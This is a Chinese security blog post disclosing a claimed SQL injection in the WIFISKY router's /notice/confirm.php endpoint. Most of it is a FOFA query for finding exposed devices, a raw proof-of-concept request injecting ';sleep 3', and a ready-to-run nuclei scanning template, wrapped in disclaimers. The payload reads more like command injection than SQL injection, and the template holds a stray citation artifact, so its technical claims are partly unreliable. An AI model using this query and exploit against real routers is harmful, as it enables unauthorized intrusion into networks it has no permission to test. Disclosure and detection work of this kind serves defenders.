WIFISKY-7层流控路由器SQL注入漏洞

admin 2025年3月31日20:47:38评论28 views字数 1132阅读3分46秒阅读模式

免责声明

       请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
FOFA:
app="WIFISKY-7层流控路由器"
WIFISKY-7层流控路由器SQL注入漏洞
POC:
GET /notice/confirm.php?t=;sleep%203 HTTP/1.1Host: {{Hostname}}User-Agent:Mozilla/5.0(WindowsNT10.0;Win64; x64)AppleWebKit/537.36(KHTML, likeGecko)Chrome/96.0.4664.93Safari/537.36
t参数存在SQL注入漏洞,利用poc进行sql延时三秒测试,查看响应时间
WIFISKY-7层流控路由器SQL注入漏洞
nuclei模板:
id: wifisky-7-sql-injectioninfo:  name: WIFISKY-7层流控路由器SQL注入漏洞  author: Kimi  severity: high  description: WIFISKY-7层流控路由器的/notice/confirm.php接口存在SQL注入漏洞,攻击者可通过构造恶意请求导致时间延迟,从而判断漏洞存在[^6^]。  tags: sql-injection, time-basedrequests:  - raw:      - |        GET /notice/confirm.php?t=;sleep%203 HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0(WindowsNT10.0;Win64; x64)AppleWebKit/537.36(KHTML, likeGecko)Chrome/96.0.4664.93Safari/537.36    matchers:      - type: dsl        dsl:          - response.time > 3000

说明:

  1. id:模板的唯一标识符,用于区分不同的模板。

  2. info:包含模板的基本信息,如名称、作者、严重性、描述和标签。

  3. requests:定义了用于测试的HTTP请求。

  4. raw:直接使用原始HTTP请求格式,便于精确控制请求内容。

  5. matchers:定义了如何判断响应是否表示漏洞存在。这里通过检测响应时间是否超过3秒来判断是否存在SQL注入漏洞

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

原文始发于微信公众号(HK安全小屋):WIFISKY-7层流控路由器SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月31日20:47:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WIFISKY-7层流控路由器SQL注入漏洞https://cn-sec.com/archives/3903140.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息